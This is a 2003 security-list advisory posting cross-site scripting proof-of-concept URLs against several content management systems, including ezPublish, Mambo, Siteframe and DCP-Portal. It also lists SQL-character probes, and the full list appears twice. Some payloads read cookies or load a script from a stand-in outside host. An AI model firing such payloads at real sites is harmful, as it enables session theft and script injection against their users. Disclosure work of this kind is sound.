Some XSS vulnsMar 18 2003 11:59PM Ertan Kurt (ertank olympos org)
While searching for a CMS for my site I found out the following:
ezPublish 2.2.7
http://target/search/?SectionIDOverride=1&SearchText=<script>alert(docum
ent.cookie);</script>
also when entered an URL like
http://target/<script>alert('test')</script> and site admin checks
latest served URLs the script will run
Vendor Site: http://www.ez.no
Nuked-klan 1.3b
it doesn work if it starts with <script but by adding a "> the script will run
http://target/index.php?file=Liens&op="><script>alert('test');</script>
Vendor Site: http://www.nuked-klan.org
Siteframe 2.2.4
Same "> issue here
http://target/search.php?searchfor="><script>alert('test');</script>
http://target/download.php?id=2% (shows some info)
Vendor Site: http://www.siteframe.org
Mambo Site Server 4.0 build 10
http://target/index.php?option=search&searchword=<script>alert(document.
cookie);</script>
Vendor Site: http://www.mamboserver.com
Basit cms 1.0
Content module: // Some sql chars and unwanted behaviour (loop->DoS?)
http://target/modules/Content/?op=sec&s=--
http://target/modules/Content/?op=sec&s='
http://target/modules/Content/?op=sec&s=;
Submit module:
http://target/modules/Submit/index.php?op=pre&title=<script%20src="http:
//othersite/code.js">test</script>
http://target/modules/Submit/index.php?op=pre&title=<script>alert(docume
nt.cookie);</script>
Search module:
http://target/modules/Search/index.php?q="><script+src=http://othersite/
code.js></script>&op=search
Vendor Site: http://basitonline.com
ezPublish 2.2.7
http://target/search/?SectionIDOverride=1&SearchText=<script>alert(docum
ent.cookie);</script>
also when entered an URL like
http://target/<script>alert('test')</script> and site admin checks
latest served URLs the script will run
Vendor Site: http://www.ez.no
DCP-Portal v5.3.1
http://target/search.php?fields=content&q=<script%20src=http://othersite
/code.js></script>
http://target/calendar.php?year=<script>alert(document.cookie);</script>
&month=03&day=05
Vendor Site: http://www.dcp-portal.org
Nuked-klan 1.3b
it doesn work if it starts with <script but by adding a "> the script will run
http://target/index.php?file=Liens&op="><script>alert('test');</script>
Vendor Site: http://www.nuked-klan.org
Siteframe 2.2.4
Same "> issue here
http://target/search.php?searchfor="><script>alert('test');</script>
http://target/download.php?id=2% (shows some info)
Vendor Site: http://www.siteframe.org
Mambo Site Server 4.0 build 10
http://target/index.php?option=search&searchword=<script>alert(document.
cookie);</script>
Vendor Site: http://www.mamboserver.com
Basit cms 1.0
Content module: // Some sql chars and unwanted behaviour (loop->DoS?)
http://target/modules/Content/?op=sec&s=--
http://target/modules/Content/?op=sec&s='
http://target/modules/Content/?op=sec&s=;
Submit module:
http://target/modules/Submit/index.php?op=pre&title=<script%20src="http:
//othersite/code.js">test</script>
http://target/modules/Submit/index.php?op=pre&title=<script>alert(docume
nt.cookie);</script>
Search module:
http://target/modules/Search/index.php?q="><script+src=http://othersite/
code.js></script>&op=search
Vendor Site: http://basitonline.com
Ertan Kurt
Olympos Security
[ reply ]